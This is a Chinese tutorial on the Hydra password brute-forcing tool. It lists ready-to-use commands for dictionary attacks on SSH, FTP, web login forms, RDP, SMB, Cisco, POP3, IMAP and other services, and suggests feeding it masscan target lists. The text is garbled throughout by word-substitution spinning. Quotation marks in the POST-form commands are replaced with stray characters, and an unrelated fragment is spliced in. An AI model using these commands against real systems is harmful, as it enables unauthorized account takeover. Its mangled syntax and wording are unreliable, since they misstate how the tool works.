hail hydra
每个漫威粉都该当知道这个口号,它是漫威宇宙中最大的人类反派组织九头蛇的名片。
如今hydra是行业有名的密码暴力破解工具。

(1)安装hydra

以centos7为例,安装完epel库后直策应用 yum install -y hydra 即可安装。

破解postphp基于linux的暗码暴力破解对象 NoSQL

(2)利用hydra

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]

server service [OPT]

例如:

hydra -l root -P passwd.txt 192.168.1.1 -V -s 22 ssh -o show.txt

利用root加passwd.txt的密码词典爆破192.168.1.1 ssh的22号端口并显示破解信息并将破解的信息输出到show.txt文件里面。

(1)大写的L 可以指定用户词典。

(2)小写的p可以指定密码。

(3)大写的M可以指定目标IP库,一行一条,合营masscan扫描器利用切实其实神器。

(4)-f 在利用-M参数后,找到第一对登录名或者密码的时候终止破解。

(5)-t 同时运行的线程数,默认为16。

(6)-w 设置最大超时的韶光,单位秒,默认是30s。

(7)-o 指定结果输出文件。

(8)-e ns 可选选项,n:空密码试探,s:利用指定用户和密码试探。

(9)大写的S 采取SSL连接。

(10)-R 连续从上一次进度接着破解。

利用方法:

(1)破解ssh:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

(2)破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

(3)get办法提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

(4)post办法提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form \公众/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password\"大众

hydra -t 3 -l admin -P pass.txt -o out.txt -f 192.168.1.1 http-post-form \公众login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>\"大众

(参数解释:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停滞, 192.168.1.1目标ip,http-post-form表示破解是采取http的post办法提交的表单密码破解,<title>中 的内容是表示缺点猜解的返复书息提示。

(5)破解https:

hydra -m /index.php -l muts -P pass.txt 192.168.1.1 https

(6)破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

(7)破解cisco:

hydra -P pass.txt 192.168.1.254 cisco

hydra -m cloud -P pass.txt 192.168.1.254 cisco-enable

(8)破解smb:

hydra -l administrator -P pass.txt 192.168.1.1 smb

(9)破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

(10)破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

(11)破解http-proxy:

hydra -l admin -P pass.txt http-proxy://192.168.1.1

(12)破解imap:

hydra -L user.txt -p secret 192.168.1.1 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

末了小结

(1)这个工具仅供测试做事器系统的密码强度。

(2)账号密码词典须要自己编写或者去找安全大神要。

(3)它究竟是一个工具,要想发挥其最大的浸染,须要配和wireshark、nmap、masscan利用。

(4)附上windows版本的下载地址

https://github.com/maaaaz/thc-hydra-windows